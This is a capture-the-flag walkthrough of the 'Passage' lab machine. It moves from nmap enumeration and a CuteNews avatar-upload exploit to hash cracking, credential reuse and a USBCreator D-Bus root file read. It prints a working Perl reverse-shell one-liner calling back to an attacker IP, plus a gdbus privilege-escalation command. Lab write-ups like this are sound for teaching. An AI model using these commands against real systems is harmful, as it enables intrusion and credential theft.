Intro
Passage is a Ubuntu box. It had a few privesc and a few tricks up it’s sleeve to prevent what you might typically do for initial enumeration.
Enumeration
A standard nmap scan shows that ssh is running on port 22 and an Apache web server is running on port 80.
sudo nmap -sV -sC -Pn -oA Passage 10.10.10.206
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-19 17:14 MDT
Nmap scan report for 10.10.10.206
Host is up (0.096s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.44 seconds
SSH could be useful later but since that doesn’t seem too look out of date, the web server is the first place to look. It seems to be running a CMS called Cute News and has mostly just filer articles. The most recent post is rather important though.
http://10.10.10.206/index.php?id=11
Fail2Ban is a service that can be used to mitigate bruteforce attacks. Because it is implemented here, ffuf or another directory buster is going to be a futile effort.
Looking through the authors of the articles, two possible users are found, though there isn’t an obvious place to make use of them outside of attempting to bruteforce SSH.
Paul Coles (paul@passege.htb)
Admin (nadav@passege.htb)
The nmap scan and browsing on the site revels the CMS in use, Cute News. A quick google finds a Metasploit module on Exploit DB. That module doesn’t seem to be functioning out of the box though and a GitHub issue related to it can be found below. There was a fix described but didn’t lead to a shell in this case.
https://github.com/rapid7/metasploit-framework/issues/13246
Foothold
Eventually, I work my way out and am nudged to take a closer look at the source code of the main page. From this we can see a number of resources being loaded from paths that start with CuteNews We navigate to /CuteNews and find a login page.
There were some usernames found prior but no passwords. However it is possible to create an account.
Once logged in, the bottom of the screen helpfully shows a version number. That leads to a second Exploit DB script.
https://www.exploit-db.com/exploits/48800
It takes exploits CVE-2019-11447 to upload a PHP shell though the avatar upload feature and then further attempts to extract any credentials from, /var/www/html/CuteNews/cdata/users/lines These can then potentially cracked expanding access.
First things first though, upgrade the shell. This works but is far from a full TTY. The old favorite using Bash doesn’t return nor does Python2 or 3. However, Perl does work.
User
perl -e 'use Socket;$i="10.0.14.11";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
The callback is caught with a simple netcat listener and then the shell can be upgraded. python -c 'import pty; pty.spawn("/bin/bash")'
CrackStation is a quick way to check certain kinds of hashes. There are a couple matches.
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc:egre55 (crackstation)
CrackStation didn’t get all of them though. Hashcat will have to try to do some clean up.
7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1 (hashcat)
Passwords and Users in hand the door is open to check for password reuse. paul isn’t perfect. su paul using the password of atlanta1 is successful.
Paul has ssh set up that can be borrowed for persistence and a more stable shell. There doens’t seem to be an obvious was to privesc to Nadav or root. But, the pattern of reusing credentials continues an Paul’s SSH Key also works for a Nadav.
Root
One of the first things to do is check the contents of the users home directory. There is an interesting file,
.viminfo
Inside are references to pkexec, which is a binary similar to sudo, and dbus-1. Though logging into Nadav over SSH is possible but the password for Nadav’s account is not currently known. This rules out a simple win from pkexec since it is configured to require a password.
On the other hand, dbus-1 does have vulnerability associated with it.
https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
USBCreator mode can be leveraged to allows us to overwrite arbitrary files as root. Since that is running as root we can effectively read an write as the root user. The below command copies the contents of root.txt over to /tmp/...
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /tmp/... true
Closing thoughts
There are a few ways an attacker could get a full shell as root. Root does have valid ssh keys and you could copy these off the same way you got root.txt. Alternatively you could snag /etc/shadow and /etc/passwd and crack the hashes.
Reuse of credentials was a definite theme ruing the box and I enjoyed learning about the USBCreator vulnerability. It required sudo access but was a bit different than cookie cutter GTFO bin. Thanks to ChefByzen for creating an awesome box!